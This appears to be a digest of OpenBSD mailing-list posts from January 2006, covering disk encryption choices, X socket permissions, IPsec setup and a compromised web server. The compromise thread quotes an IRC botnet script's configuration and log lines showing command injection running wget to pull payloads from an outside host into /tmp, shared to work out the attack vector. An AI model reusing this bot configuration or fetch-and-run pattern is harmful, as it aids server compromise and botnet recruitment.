Re: CGD

[Karl O. Pinc]

On 02/04/2006 01:05:17 AM, veins wrote:

I think you are missing the point, cgd and salting are two different  
and

unrelated things. It's not because cgd isn't making it into OpenBSD,
that salting won't make it into svnd. I'd explain, but frankly after a
night at work i'd rather go and sleep while you google :-)


I know cgd and salting are two different things, but cgd salts
and svnd does not.  IMO, what the thread is about is the criticisms
that came up of svnd, compared with the goodness of CGD,
in the interview about CGD.  So, people are
suddenly wanting CGD...  Or maybe I am OT, it is late.  :)
The svnd salting patch did come up in the CGD thread, which
sorta changed the subject to whether or not svnd _should_ salt.

ps. tedu just said that he got no comments about his diff, if you  
really

think the idea is valuable, you should be testing the diff.


You are right.  But
another point of my post was to indicate that yes, tedu is right
in that most people _won't_ run CGD (or svnd) but people _still_
appreciate having the option open.  I, like IMO a lot of
people, have only enough interest to kibbutz in the hope
of slowly collecting enough information to make an informed
choice should the time come to exercise the option.
The only apology I make regards this aspect of
my post is cluttering up the list in the
hopes that what I say will make the people actually doing
the work feel appreciated rather than put-upon,
by pointing out that the clueless questions
are an indication of the large breadth (but not depth) of
desire for a crypto fs.  It seems tough working on something
complex a whole lot of people sorta think they want a
little bit.  Crypto fs seems to fit that bill
more than most. So in way of support I thought I'd
try to point this out and give encouragement.
Again, sorry if it's a distraction.

Regardless, thanks for hitting me with a clue-stick even if I did
not need it, because sometimes I do.  :-)

Karl [EMAIL PROTECTED]
Free Software:  You don't pay back, you pay forward.
 -- Robert A. Heinlein

Re: DadOS - sys shutdown with XDM

[Dave Feustel]

On Wednesday 04 January 2006 02:36, Otto Moerbeek wrote:
 
 On Tue, 3 Jan 2006, Dave Feustel wrote:
 
  On Tuesday 03 January 2006 17:50, Otto Moerbeek wrote:
   
   On Tue, 3 Jan 2006, Dave Feustel wrote:
   
On Tuesday 03 January 2006 17:11, J.C. Roberts wrote:

 The rule of thumb for granting privileges is simple; avoid granting
 permissions whenever possible.

Check the ownership/privileges on /tmp/.X11-unix/X0 after you start kde 
or Xorg.
   
   Come on, this is a unix domain socket, as has been pointed out before.
   You keep on repeating this nonsense. Having a world writable socket is
   not a problem in itself. X has it's own authentication/authorization
   scheme, which is used both for unix domain sockets and tcp sockets. 
  
  I confess that I do not understand the ramifications of the world rw+suid
  permissions on this socket. I do wonder why this socket has world rw when 
  it seems to work equally well after I do a chmod 4700 on it at the 
  beginning 
  of every kde session. Do not the permissions applied to this socket violate 
  the principle of least privilege mentioned above?
 
 It does not have suid permissions. This clearly shows you understand
 little about permissions. Hint: it's a socket, starting with an 's'.
 
 The princpiple is not violated, because having the socket writable for
 others has it's uses, maybe?
 
   -Otto
Otto,

I reread the man page for ls and I did indeed misread the documentation
as to what the 's' means here.  Thanks for pointing that out.

 50 srwxrwxrwx1 daf  wheel   0 Jan  4 05:01 
/tmp/.X11-unix/X0
 80 srwx--1 daf  wheel   0 Jan  4 05:01 
/tmp/.ICE-unix/dcop15166-1136368903
 90 srwx--1 daf  wheel   0 Jan  4 05:01 
/tmp/.ICE-unix/389


-- 
Lose, v., experience a loss, get rid of, lose the weight
Loose, adj., not tight, let go, free, loose clothing

Re: CGD

[knitti]

On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:
 On 1/3/06, knitti [EMAIL PROTECTED] wrote:
  cgd gives users some choice over how to build their encrypted partition.
  you're able to use different ciphers.
  in the unlikely case of a cipher getting broken, you have the possibility to
  switch instantly, using a tool you know with stable code an the same way
  you configured it.

 this is really not that useful.  why would you pick anything other
 than the best when setting it up?

because no one knows what the best is. blowfish appears to be the best
at the moment, because its secure and fast. some other people don't like
block sizes of 64 bit. so perhaps they take aes, which is slightly slower
but encrypts blocks of 128 bit. is it for no reason, that swap encryption
uses aes over blowfish?

  and after it's setup, you can't
 change.  the idea that once a cipher is broken you could migrate is
 nice, but think about it.  are you equipping all your servers with
 double storage so that you can copy and reencrypt everything?  i doubt
 anyone has thougt more than 10 seconds about what the migration
 procedure would really be.

a pain in the ass. but you can plan for it.

 anyway, it's not that hard to switch
 ciphers in svnd.  how critical is your timeframe?  can you wait 24
 hours to upgrade?

no one besides you (the developers) knows, how quick an upgrade
would be possible. 24h _is_ really fast, and a week would probably
suffice too, for most people.  I think this rocks, but no one knew it
would be that fast.

  you're able to change your passphrase without reencrypting your container.

 not really, or at least not any more so than with svnd.

encrypting with your passphrase (as would be the easy way with svnd)
is using a weaker keyspace than encrypting with a generated key. but
you are right, that would be possible with svnd too.


--knitti

Re: upgrading packages with pkg_add -u and pkg_add -r

[z0mbix]

On 1/3/06, Justin H Haynes [EMAIL PROTECTED] wrote:

 I really appreciate this work.  Until it is complete, here are a few
 quick and dirty things I do to make the upgrade process a little
 easier.  Probably common sense to many, but I'll share it all the same:

 https://justinhaynes.com/weblog/package-updates-in-openbsd-38/

 -Justin


This is good, but you should substitute:

uname -a | awk '{print $3}'

for

uname -r

and

uname -a | awk '{print $5}'

for

uname -m

Re: learning to code - suggestions needed

[Luís Bruno]

Edd Barrett wrote:
I'm taking a university degree that teaches unix system programming in 
solaris in the second year.


FWIW, here we scratch the surface too... But I was glad I read the knf 
manpage and some code reviews on this list. The c.l.c FAQ was also a 
very good resource.


On a tangent, comp.risks and Bruce Shneier should be required reading 
for anyone who's programming. It's less expensive to learn through 
other's mistakes.


So I guess this tells you to expect to do some learning on your own by 
using these and other's resources. I no longer think I could be 
competent just by going to school.


--
Luis disenchanted with school Bruno

Re: CGD

[Marco Peereboom]

  this is really not that useful.  why would you pick anything other
  than the best when setting it up?
 
 because no one knows what the best is. blowfish appears to be the best
 at the moment, because its secure and fast. some other people don't like
 block sizes of 64 bit. so perhaps they take aes, which is slightly slower
 but encrypts blocks of 128 bit. is it for no reason, that swap encryption
 uses aes over blowfish?

If you really meant what you said you should let the people that write an OS
make that decision for you.

And just for everyone's entertainment, when was it the last time that you saw
swap being used?

How did they get here?

[Gaby vanhegan]

To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173  
i386.

I have some suspect files in /tmp, and I'm fairly sure that they  
shouldn't be there.  Only thing I can't twig is what method the  
attackers used to get the files into that directory.  The files are:

### Microsoft Search Worm - by br0k3d  
###
   # From the same author of LinuxDay Worm and  
other variants  ###

And:

#  ShellBOT
#  0ldW0lf - [EMAIL PROTECTED]
#  - www.atrix-br.cjb.net
#  - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp.  Reading them through, they  
just look like IRC clients written in Perl that have some remote  
commands for DOS, and the likes.  They connect to a chatroom and  
print some message or other.  If anybody wants to have some fun, the  
main config block is:

# IRC
my @adms=(darkwoot, br0k3d, vipzen, Nandokabala);   #nick dos  
administradores
my @canais=(#gestapo);
my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso..  
vai aparece com um numero radonamico no final
my $ircname = 'SSSA';
chop (my $realname = `uname -a`);
$servidor='irc.agitamanaus.net' unless $servidor;   #servidor d irc q  
vai c usadu c naum for especificado no argumento
my $porta='6667';   #porta do servidor d irc

My question is how did these files get into the machine.  I have  
entries in the httpd error log that look like this:

--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
= `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... --05:10:57--  http:// 
arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
= `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed:  
Connection timed out.
Retrying.

--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
   (try: 2) = `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]

 0K ...   100%   
468.05 KB/s

05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is  
causing wget to run and fetch some files.  There are more instances  
of the same thing, but they're all fetching a file from the same  
place (either .cpanel, .cpanel.tmp or .plesk).

Because they're in the default Apache error log, the attacker must  
have hit a website on the machine that doesn't have an ErrorLog  
defined, or they hit the machine by IP instead of a hostname.  I got  
a list of sites that have no error log (and would log to /var/www/ 
logs/error_log) and checked their transfer logs.  None of them had  
any entries in them that correspond to any of the times on the wget  
entries, so I learn nothing from this.  There are earlier entries as  
well, doing the same thing, but to a different site

I'm going to do a bulk grep on all the web server logs to see if  
anything about wget turns up in any of them, and if I can then work  
out which script on which site is causing the problem.  As far as I  
can tell, there is no damage, but there are some entries like these  
in the error logs:

/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
/tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run  
a Linux binary unsuccessfully?  Good job I leave Linux emulation  
turned off... :)

So, what's my next move?  My daily/weekly security emails show  
nothing to be worried about, no changes to any system critical files  
or anything of that ilk.  Where can I look for more information or  
clues?  I know the machine is due for an upgrade, and that's next on  
my list.  I would provide a dmesg but the machine has been up for a  
while with one full disk, so it's been pushed out of the end of the  
dmesg file.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

Re: VPN packets not passing remote gateway [RESOLVED... sorta]

[Jason Dixon]

On Jan 4, 2006, at 9:32 AM, Hekan Olsson wrote:


On 4 jan 2006, at 05.57, Jason Dixon wrote:

After some gentle persuading by Adrian Close, I dropped ipsecadm  
and went back to automatic key exchange with isakmpd.  A quick  
configuration based on the east/west and all is good.  Same PF  
configuration, no changes there except for the addition of ISAKMP  
traffic.  Don't know what the problem was, although I'm sure it  
was user related.


Your manual setup only included one SA (SPI 0x100a), and you always  
need atleast two, as an SA is unidirectional.


I tried that too before moving over to ISAKMP.  It was still behaving  
the same, but it was probably user error.



Thanks,

--
Jason Dixon
DixonGroup Consulting
http://www.dixongroup.net

Re: VPN packets not passing remote gateway [RESOLVED... sorta]

[Will H. Backman]

Jason Dixon wrote:

On Jan 4, 2006, at 9:32 AM, Hekan Olsson wrote:


On 4 jan 2006, at 05.57, Jason Dixon wrote:

After some gentle persuading by Adrian Close, I dropped ipsecadm  and 
went back to automatic key exchange with isakmpd.  A quick  
configuration based on the east/west and all is good.  Same PF  
configuration, no changes there except for the addition of ISAKMP  
traffic.  Don't know what the problem was, although I'm sure it  was 
user related.



Your manual setup only included one SA (SPI 0x100a), and you always  
need atleast two, as an SA is unidirectional.



I tried that too before moving over to ISAKMP.  It was still behaving  
the same, but it was probably user error.



Thanks,

--
Jason Dixon
DixonGroup Consulting
http://www.dixongroup.net



Here is the most simple manual keying setup I could make:
I can create a manually keyed host to host vpn with two lines in 
/etc/ipsec.conf
On the other host, just make sure to swap the IPs, spi numbers and the 
auth and enc keys.  They key values are for testing only.


flow esp from 192.168.71.129 to 192.168.71.128
esp from 192.168.71.129 to 192.168.71.128 spi 0x1000:0x1001 authkey 
0x:0x0001 
enckey 
0x:0x0001

Re: How did they get here?

[Pedro Martelletto]

Looks like you've made some new friends in Manaus, Brazil :-)

-p.

On Wed, Jan 04, 2006 at 02:50:01PM +, Gaby vanhegan wrote:
 To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173  
 i386.
 
 I have some suspect files in /tmp, and I'm fairly sure that they  
 shouldn't be there.  Only thing I can't twig is what method the  
 attackers used to get the files into that directory.  The files are:
 
 ### Microsoft Search Worm - by br0k3d  
 ###
    # From the same author of LinuxDay Worm and  
 other variants  ###
 
 And:
 
 #  ShellBOT
 #  0ldW0lf - [EMAIL PROTECTED]
 #  - www.atrix-br.cjb.net
 #  - www.atrix.cjb.net
 
 in /tmp/.cpanel and /tmp/.cpanel.tmp.  Reading them through, they  
 just look like IRC clients written in Perl that have some remote  
 commands for DOS, and the likes.  They connect to a chatroom and  
 print some message or other.  If anybody wants to have some fun, the  
 main config block is:
 
 # IRC
 my @adms=(darkwoot, br0k3d, vipzen, Nandokabala);   #nick dos  
 administradores
 my @canais=(#gestapo);
 my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso..  
 vai aparece com um numero radonamico no final
 my $ircname = 'SSSA';
 chop (my $realname = `uname -a`);
 $servidor='irc.agitamanaus.net' unless $servidor;   #servidor d irc q  
 vai c usadu c naum for especificado no argumento
 my $porta='6667';   #porta do servidor d irc
 
 My question is how did these files get into the machine.  I have  
 entries in the httpd error log that look like this:
 
 --05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
 = `/tmp/.cpanel'
 Resolving arnold.dvclub.com.hk... done.
 Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
 HTTP request sent, awaiting response... --05:10:57--  http:// 
 arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
 = `/tmp/.cpanel.tmp'
 Resolving arnold.dvclub.com.hk... done.
 Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed:  
 Connection timed out.
 Retrying.
 
 --05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
(try: 2) = `/tmp/.cpanel.tmp'
 Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
 Length: 3,355 [text/plain]
 
  0K ...   100%   
 468.05 KB/s
 
 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]
 
 So something is clearly injecting a command into a script, and it is  
 causing wget to run and fetch some files.  There are more instances  
 of the same thing, but they're all fetching a file from the same  
 place (either .cpanel, .cpanel.tmp or .plesk).
 
 Because they're in the default Apache error log, the attacker must  
 have hit a website on the machine that doesn't have an ErrorLog  
 defined, or they hit the machine by IP instead of a hostname.  I got  
 a list of sites that have no error log (and would log to /var/www/ 
 logs/error_log) and checked their transfer logs.  None of them had  
 any entries in them that correspond to any of the times on the wget  
 entries, so I learn nothing from this.  There are earlier entries as  
 well, doing the same thing, but to a different site
 
 I'm going to do a bulk grep on all the web server logs to see if  
 anything about wget turns up in any of them, and if I can then work  
 out which script on which site is causing the problem.  As far as I  
 can tell, there is no damage, but there are some entries like these  
 in the error logs:
 
 /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
 /tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found
 /tmp/x44423[4]: syntax error: `(' unexpected
 
 Am I right in thinking that these entries show somebody trying to run  
 a Linux binary unsuccessfully?  Good job I leave Linux emulation  
 turned off... :)
 
 So, what's my next move?  My daily/weekly security emails show  
 nothing to be worried about, no changes to any system critical files  
 or anything of that ilk.  Where can I look for more information or  
 clues?  I know the machine is due for an upgrade, and that's next on  
 my list.  I would provide a dmesg but the machine has been up for a  
 while with one full disk, so it's been pushed out of the end of the  
 dmesg file.
 
 Gaby
 
 --
 Junkets for bunterish lickspittles since 1998!
 http://vanhegan.net/sudoku/
 http://weblog.vanhegan.net/

Re: CGD

[knitti]

On 1/4/06, Marco Peereboom [EMAIL PROTECTED] wrote:
  because no one knows what the best is. blowfish appears to be the best
  at the moment, because its secure and fast. some other people don't like
  block sizes of 64 bit. so perhaps they take aes, which is slightly slower
  but encrypts blocks of 128 bit. is it for no reason, that swap encryption
  uses aes over blowfish?

 If you really meant what you said you should let the people that write an OS
 make that decision for you.
apparently there is no such thing as a general best, only an application
specific. or do you suggest there is one? why would the developers then
decide to use blowfish for svnd and aes for swap?
as it looks, data in swap is more secure than on svnd. known plaintext attacks
are far more difficult, and no problem with replay attacks. why shouldn't I be
able to have this also for storage? if that's the decision by the developers,
I'd rather decide on my own.

 And just for everyone's entertainment, when was it the last time that you saw
 swap being used?
last year. five days ago.

--knitti

Re: How did they get here?

[Pete Vickers]

Hi,


Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_  
only from know good backup. You could use a boot cdrom  dd off an  
image of the disk for later analysis if you want first.


Is there some attack vector like php or such available on the  
machine ? maybe they used that to retrieve  write the file ? ... but  
access to /tmp is tricky from a chrooted httpd !



/Pete



On 4. jan. 2006, at 15.50, Gaby vanhegan wrote:


To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
i386.

I have some suspect files in /tmp, and I'm fairly sure that they
shouldn't be there.  Only thing I can't twig is what method the
attackers used to get the files into that directory.  The files are:

### Microsoft Search Worm - by br0k3d
###
   # From the same author of LinuxDay Worm and
other variants  ###

And:

#  ShellBOT
#  0ldW0lf - [EMAIL PROTECTED]
#  - www.atrix-br.cjb.net
#  - www.atrix.cjb.net

in /tmp/.cpanel and /tmp/.cpanel.tmp.  Reading them through, they
just look like IRC clients written in Perl that have some remote
commands for DOS, and the likes.  They connect to a chatroom and
print some message or other.  If anybody wants to have some fun, the
main config block is:

# IRC
my @adms=(darkwoot, br0k3d, vipzen, Nandokabala);   #nick dos
administradores
my @canais=(#gestapo);
my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso..
vai aparece com um numero radonamico no final
my $ircname = 'SSSA';
chop (my $realname = `uname -a`);
$servidor='irc.agitamanaus.net' unless $servidor;   #servidor d irc q
vai c usadu c naum for especificado no argumento
my $porta='6667';   #porta do servidor d irc

My question is how did these files get into the machine.  I have
entries in the httpd error log that look like this:

--05:10:47--  http://arnold.dvclub.com.hk/phpBB2/linuxday.txt
= `/tmp/.cpanel'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected.
HTTP request sent, awaiting response... --05:10:57--  http://
arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
= `/tmp/.cpanel.tmp'
Resolving arnold.dvclub.com.hk... done.
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed:
Connection timed out.
Retrying.

--05:12:13--  http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt
   (try: 2) = `/tmp/.cpanel.tmp'
Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK
Length: 3,355 [text/plain]

 0K ...   100%
468.05 KB/s

05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355]

So something is clearly injecting a command into a script, and it is
causing wget to run and fetch some files.  There are more instances
of the same thing, but they're all fetching a file from the same
place (either .cpanel, .cpanel.tmp or .plesk).

Because they're in the default Apache error log, the attacker must
have hit a website on the machine that doesn't have an ErrorLog
defined, or they hit the machine by IP instead of a hostname.  I got
a list of sites that have no error log (and would log to /var/www/
logs/error_log) and checked their transfer logs.  None of them had
any entries in them that correspond to any of the times on the wget
entries, so I learn nothing from this.  There are earlier entries as
well, doing the same thing, but to a different site

I'm going to do a bulk grep on all the web server logs to see if
anything about wget turns up in any of them, and if I can then work
out which script on which site is causing the problem.  As far as I
can tell, there is no damage, but there are some entries like these
in the error logs:

/tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found
/tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found
/tmp/x44423[4]: syntax error: `(' unexpected

Am I right in thinking that these entries show somebody trying to run
a Linux binary unsuccessfully?  Good job I leave Linux emulation
turned off... :)

So, what's my next move?  My daily/weekly security emails show
nothing to be worried about, no changes to any system critical files
or anything of that ilk.  Where can I look for more information or
clues?  I know the machine is due for an upgrade, and that's next on
my list.  I would provide a dmesg but the machine has been up for a
while with one full disk, so it's been pushed out of the end of the
dmesg file.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

Re: How did they get here?

[eric]

On Wed, 2006-01-04 at 14:50:01 +, Gaby vanhegan proclaimed...

 To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173  
 i386.
 
 I have some suspect files in /tmp, and I'm fairly sure that they  
 shouldn't be there.  Only thing I can't twig is what method the  
 attackers used to get the files into that directory.  The files are:

Is this doing any A/V scanning? You have told us nothign about the host in
question: is it an email gateway? DNS server? etc.

Re: How did they get here?

[Gaby vanhegan]

On 4 Jan 2006, at 15:51, Pete Vickers wrote:

 Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_  
 only from know good backup. You could use a boot cdrom  dd off an  
 image of the disk for later analysis if you want first.

It seems that the files have been uploaded, but they haven't actually  
caused any damage, or even been run.  Unfortunately, I don't have the  
resources to mount a full investigation.  Grep'ing every httpd log on  
the machine has produced no more information, but the fact that the  
actual wget output was in the httpd logs leads me to think that was  
the way in.

 Is there some attack vector like php or such available on the  
 machine ? maybe they used that to retrieve  write the file?

The messages in the log file indicate that they used some command  
injection in a script to call wget and download the files into /tmp.   
I'm fairly sure it was via a bad script, and I'm trying to locate  
which script was used, so far with no success.

 ... but access to /tmp is tricky from a chrooted httpd !

Legacy sites mean that we haven't tried to chroot apache yet.  I  
think it's probably time to bite the bullet and get this done :)

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

Re: How did they get here?

[Gaby vanhegan]

On 4 Jan 2006, at 16:05, eric wrote:

 I have some suspect files in /tmp, and I'm fairly sure that they
 shouldn't be there.  Only thing I can't twig is what method the
 attackers used to get the files into that directory.  The files are:

 Is this doing any A/V scanning? You have told us nothign about the  
 host in
 question: is it an email gateway? DNS server? etc.

It runs:

- qmail/spamassassin-spamd/openbsd-spamd/rblsmtpd
- stock apache/php 4.3.8

It does no AV scanning above and beyond what SpamAssassin provides.   
It does not run any DNS services.  I outlined my reasons why I  
thought it was a php/cgi script problem, being that the messages were  
found in the default httpd error logs.

Finally, here is a dmesg (thanks Josh :-)

OpenBSD 3.6 (GENERIC.MP) #173: Fri Sep 17 12:52:31 MDT 2004
 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP
cpu0: Intel Pentium III (GenuineIntel 686-class) 601 MHz
cpu0:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
MMX,FXSR,SSE
real mem  = 1073324032 (1048168K)
avail mem = 972726272 (949928K)
using 4278 buffers containing 53768192 bytes (52508K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(00) BIOS, date 07/15/99, BIOS32 rev. 0 @  
0xfdb50
apm0 at bios0: Power Management spec V1.2
apm0: AC on, battery charge unknown
pcibios0 at bios0: rev 2.1 @ 0xf/0x1
pcibios0: PCI BIOS has 8 Interrupt Routing table entries
pcibios0: PCI Interrupt Router at 000:07:0 (Intel 82371AB PIIX4 ISA  
rev 0x00)
pcibios0: PCI bus #1 is the last bus
bios0: ROM list: 0xc/0x8000
mainbus0: Intel MP Specification (Version 1.1) (INTEL440GX   )
cpu0 at mainbus0: apid 0 (boot processor)
cpu0: apic clock running at 100 MHz
cpu1 at mainbus0: apid 1 (application processor)
cpu1: Intel Pentium III (GenuineIntel 686-class) 601 MHz
cpu1:  
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, 
SER,MMX,FXSR,SSE
mainbus0: bus 0 is type PCI
mainbus0: bus 1 is type PCI
mainbus0: bus 2 is type ISA
ioapic0 at mainbus0: apid 2 pa 0xfec0, version 11, 24 pins
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 Intel 82443BX AGP rev 0x03
ppb0 at pci0 dev 1 function 0 Intel 82443BX AGP rev 0x03
pci1 at ppb0 bus 1
pcib0 at pci0 dev 7 function 0 Intel 82371AB PIIX4 ISA rev 0x02
pciide0 at pci0 dev 7 function 1 Intel 82371AB IDE rev 0x01: DMA,  
channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: ST380011A
wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
wd1 at pciide0 channel 0 drive 1: IBM-DPTA-372050
wd1: 16-sector PIO, LBA, 19574MB, 40088160 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
wd1(pciide0:0:1): using PIO mode 4, Ultra-DMA mode 2
pciide0: channel 1 disabled (no drives)
uhci0 at pci0 dev 7 function 2 Intel 82371AB USB rev 0x01: apic 2  
int 19 (irq 11)
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, class 9/0, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
Intel 82371AB Power Mgmt rev 0x02 at pci0 dev 7 function 3 not  
configured
vga1 at pci0 dev 17 function 0 ATI Mach64 GP rev 0x5c
wsdisplay0 at vga1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
xl0 at pci0 dev 18 function 0 3Com 3c905B 100Base-TX rev 0x30: apic  
2 int 18 (irq 9), address 00:50:04:6a:2f:19
exphy0 at xl0 phy 24: 3Com internal media interface
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pcppi0 at isa0 port 0x61
midi0 at pcppi0: PC speaker
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
lm0 at isa0 port 0x290/8: LM79
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask 0 netmask 0 ttymask 0
pctr: 686-class user-level performance counters enabled
mtrr: Pentium Pro MTRR support
dkcsum: wd0 matched BIOS disk 80
dkcsum: wd1 matched BIOS disk 81
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
WARNING: / was not properly unmounted
apm0: disconnected

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://vanhegan.net/sudoku/
http://weblog.vanhegan.net/

Re: learning to code - suggestions needed

[Luís Bruno]

Kim Onnel wrote:

I just dont understand what ur saying


Damn, sorry about that.

 - FWIW means for what (little) it's worth :-)
 - knf is a manpage; actually, I think it's called style in section 9.
 - c.l.c. is an usenet group; the comp.lang.c FAQ has lots of tips and 
tricks which I think are very useful.


And I did start with KR; a great book. Which *also* isn't required 
reading; my teacher actually recommended Herb's book.


--
Luis Bruno

Re: How did they get here?

[Joachim Schipper]

On Wed, Jan 04, 2006 at 04:07:21PM +, Gaby vanhegan wrote:
 On 4 Jan 2006, at 15:51, Pete Vickers wrote:
  Is there some attack vector like php or such available on the  
  machine ? maybe they used that to retrieve  write the file?
 
 The messages in the log file indicate that they used some command  
 injection in a script to call wget and download the files into /tmp.   
 I'm fairly sure it was via a bad script, and I'm trying to locate  
 which script was used, so far with no success.

There was a phpBB2 in one of the paths used. If you have phpBB enabled
somewhere, that's a likely attack vector.

Joachim

Re: How did they get here?

[Bryan Irvine]

  To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173
  i386.
 
  I have some suspect files in /tmp, and I'm fairly sure that they
  shouldn't be there.  Only thing I can't twig is what method the
  attackers used to get the files into that directory.  The files are:

 Is this doing any A/V scanning? You have told us nothign about the host in
 question: is it an email gateway? DNS server? etc.

I'd suspect it has something more to do with an easy-to-guess password.

--Bryan

Re: CGD

[Ted Unangst]

On 1/4/06, knitti [EMAIL PROTECTED] wrote:
  this is really not that useful.  why would you pick anything other
  than the best when setting it up?

 because no one knows what the best is. blowfish appears to be the best
 at the moment, because its secure and fast. some other people don't like
 block sizes of 64 bit. so perhaps they take aes, which is slightly slower
 but encrypts blocks of 128 bit. is it for no reason, that swap encryption
 uses aes over blowfish?

aes has faster key setup, which is important for swap but not for
svnd.  the cvs changelog says as much.  swap encryption started out
using blowfish as well.

Re: How did they get here?

[Craig Skinner]

On Wed, Jan 04, 2006 at 05:28:38PM +0100, Joachim Schipper wrote:
 There was a phpBB2 in one of the paths used. If you have phpBB enabled
 somewhere, that's a likely attack vector.
 

I noticed that too. phpBB has been used for many sorts of tricks.

The ISP that I work for scans for it and support follow a prodecure to
warn the customer that it has been disabled. (chmod)

An easy way is to change:

AddType application/x-httpd-php .php

to:

AddType application/x-httpd-php .phtml

Most php packages come with .php files, and people that use them ususlly
don't have the nouse to alter all the files and links thoughout the
package.

Craig.

Re: CGD

[Ted Unangst]

On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote:

 aes has faster key setup, which is important for swap but not for
 svnd.  the cvs changelog says as much.  swap encryption started out
 using blowfish as well.

i also should have pointed out that swap was converted to using
rijndael, not aes, since aes did not exist at the time the conversion
was made.

Re: CGD

[Ted Unangst]

On 1/4/06, Karl O. Pinc [EMAIL PROTECTED] wrote:
 another point of my post was to indicate that yes, tedu is right
 in that most people _won't_ run CGD (or svnd) but people _still_
 appreciate having the option open.  I, like IMO a lot of
 people, have only enough interest to kibbutz in the hope
 of slowly collecting enough information to make an informed
 choice should the time come to exercise the option.

this is good idea.  the first thing you need to do is identify your
threat model.  can you write it down?  and if it starts with somebody
stealing, you lose.  amidst all the yammering, i think people are
just assuming that encrypting their data makes it safe.  but if you
can't even say what the danger is, how can you know it's safe?

Re: biosboot broken?

[M. Schatzl]

Uwe Dippel wrote:
 On Mon, 02 Jan 2006 14:06:52 +0100, M. Schatzl wrote:
 
 
Now that I switched to a 60G disk (cloned the other 2 partitions and the
Windows bootsector, then installed OpenBSD anew from the same
floppy/mirror as before), OpenBSD won't boot any more, except when I run
the boot-floopy and boot explicitely with wd0a:/bsd


OK, I finally found the error. This is the the partition table:


Disk: wd0   geometry: 5168/240/63 [78140160 Sectors]
Offset: 0   Signature: 0xAA55
 Starting   Ending   LBA Info:
